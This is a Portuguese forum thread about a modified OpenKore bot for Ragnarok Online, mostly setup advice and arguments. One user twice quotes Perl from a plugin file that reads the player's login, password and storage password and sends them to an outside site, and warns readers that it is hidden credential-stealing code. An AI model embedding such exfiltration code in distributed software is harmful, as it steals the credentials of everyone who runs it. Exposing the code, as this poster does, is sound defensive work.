Ir para conteúdo
Faça parte da equipe! (2024) ×
Conheça nossa Beta Zone! Novas áreas a caminho! ×
  • Quem está por aqui   0 membros estão online

• Nenhum usuário registrado visualizando esta página.

Openkore 3.0 editado,com esse BOT é possivel uzalo em XP,VISTA,SEVEN,100% RENEWAL

Posts Recomendados

sobre o problema do slave e algo que vc configuro errado,e a duvida do outro da pagina antes e que vc nao esta utilizando os ragexes errado por isso da erro de senha,vc deve trocar o ragexe,copia o ragexe que ta dentro da pasta do bot e cole dentro da sua pasta do ragnarok substituia pelo oque esta la,o ragexe do bot da dentro da pasta Ragexe Bot,ae se vai ver que o poseidon vai entrar e o openkore nao vai dar erro de senha

Link para o comentário
Compartilhar em outros sites

BOM, eu vi o bot ai e estou meio confuso de testar... queria saber mais sobre o windows 7, eu ja usei o bot e ja sei mecher mas quando jogava tinha o problema que o seven funfava diferente entao minha duvida e saber se esse bot nao tem problemas com o seven, como ele disse tem 1 progrma de 10 reais. mas eu preciso pagar ou vc esta disponibilizando de graça para nós... por favor me explique =x

obrigado

Link para o comentário

jente pra quem uza Seven ou Vista so funciona se for uzado com Poseidon remoto que vc paga em media 10 reais por mes pra uzar,nao vo fazer propaganda do remoto porque o do cara que uso so cai OPBGUARDBR fica mais off doque on muito lixo,muito lixo o remoto dele e o pior, e ainda tem um monte de jente usa,faz uma particao no seu pc de 5gb so pra vc colocar o bot e o rag igual eu fiz tenho Seven com 295 gb rodando e 5gb pro XP apenas pra rodar o bot e o rag nele,o problema dessa XSTools.dll sera por causa do sistema Seven ou porque nao instalo o perl que postei,mais enfim aconselho a todos fazer uma particao pro bot igual eu fiz,vai funfa 100% belezinha!

Link para o comentário

Cara, não estou acusando ninguem, mais deem uma olhada no arquivo "RelogGM.pl" na pasta "Plugins", eu encontrei isso aqui:

my $usuario = $config{'username'};

$usuario =~ s/#/:/;

my $senha = $config{'password'};

$senha =~ s/#/:/;

my $kafra = $config{'storageAuto_password'};

$kafra =~ s/#/:/;

my $response = $ua->get("

É necessário se cadastrar para acessar o conteúdo.
$senha $kafra");

Pra quem não entende nada nem o básico de programação significa que ele pega se login, senha e senha da kafra e envia para um site, o site do cara que esta hackeando todo mundo, agora mudou de arquivo com a atualização, abram o olho, abraço!

NOTA: Notem que apenas ele criou outro link, que antes no lugar era "feroz" agora é "naruto", e mudou o local do arquivo, o scan que ele fez, é do site, e não do arquivo que você está baixando, e por se tratar daquela programação, nem o scan pode ajudar, alerta, com certeza ao baixar isso ai, você vai perder sua acc, acha que é mentira?, baixa, olha, ou melhor testa e espere o resultado, por favor fechem essa porcaria de tópico com esse lixo de hacker!

Link para o comentário

Cara, não estou acusando ninguem, mais deem uma olhada no arquivo "RelogGM.pl" na pasta "Plugins", eu encontrei isso aqui:

my $usuario = $config{'username'};

$usuario =~ s/#/:/;

my $senha = $config{'password'};

$senha =~ s/#/:/;

my $kafra = $config{'storageAuto_password'};

$kafra =~ s/#/:/;

my $response = $ua->get("

É necessário se cadastrar para acessar o conteúdo.
$senha $kafra");

Pra quem não entende nada nem o básico de programação significa que ele pega se login, senha e senha da kafra e envia para um site, o site do cara que esta hackeando todo mundo, agora mudou de arquivo com a atualização, abram o olho, abraço!

NOTA: Notem que apenas ele criou outro link, que antes no lugar era "feroz" agora é "naruto", e mudou o local do arquivo, o scan que ele fez, é do site, e não do arquivo que você está baixando, e por se tratar daquela programação, nem o scan pode ajudar, alerta, com certeza ao baixar isso ai, você vai perder sua acc, acha que é mentira?, baixa, olha, ou melhor testa e espere o resultado, por favor fechem essa porcaria de tópico com esse lixo de hacker!

Vai Ignorar?, não tem defesa, CADA ATUALIZAÇÃO NÃO É PARA A MELHORIA DO BOT, APENAS PARA ELE MUDAR O LINK DO SITE DELE, E O ARQUIVO QUE CONTEM O CÓDIGO MALICIOSO, COM CERTEZA É FURADA, NÃO TEM PROVA MAIOR, ATÉ EU ACHEI QUE ELE ERA INOCENTE, MAIS DUAS VEZES FAZENDO A MESMA PRÁTICA, DE INOCENTE NÃO TEM NADA!

Link para o comentário

cara uso esse bot tem 2 meses nunca fui hakeado,se deve ter fumado um e confundido os topico,vai toma um banho pra tira a noia,que se deve ta muito doido,deve ta vendo crocodilo voando ai :rock: :rock: :rock: :rock: ta monstrooooooooooooooooooooooooooooooo

Link para o comentário

Cara, como um amigo nosso citou na outra página, você está logando em duas acc's aqui no forum ao mesmo tempo, para distribuir uma falsa idéia desse lixo de bot, já acionei a moderação, e to entrando no teu site lá, em breve você vai ter uma surpresinha ladrãozinho sujo.

NOTA: estranho né o link do seu site acabou de sair do ar, ainda bem que tenho as print's aqui sujo, dessa vez não passa impune :D

Link para o comentário

Acho que não amigo, nessa matéria de ladrões noob's eu estudei e sei como vocês lixos agem, se alguem precisar do bot limpo, sem virus e códigos maliciosos, por favor envie PM, estou disposto a ajudar sem cobrar nada, ao contrario desse ladrão!

Link para o comentário

Este tópico está impedido de receber novos posts.
 Compartilhar

• Criar Novo...

Informação Importante

Nós fazemos uso de cookies no seu dispositivo para ajudar a tornar este site melhor. Você pode ajustar suas configurações de cookies , caso contrário, vamos supor que você está bem para continuar.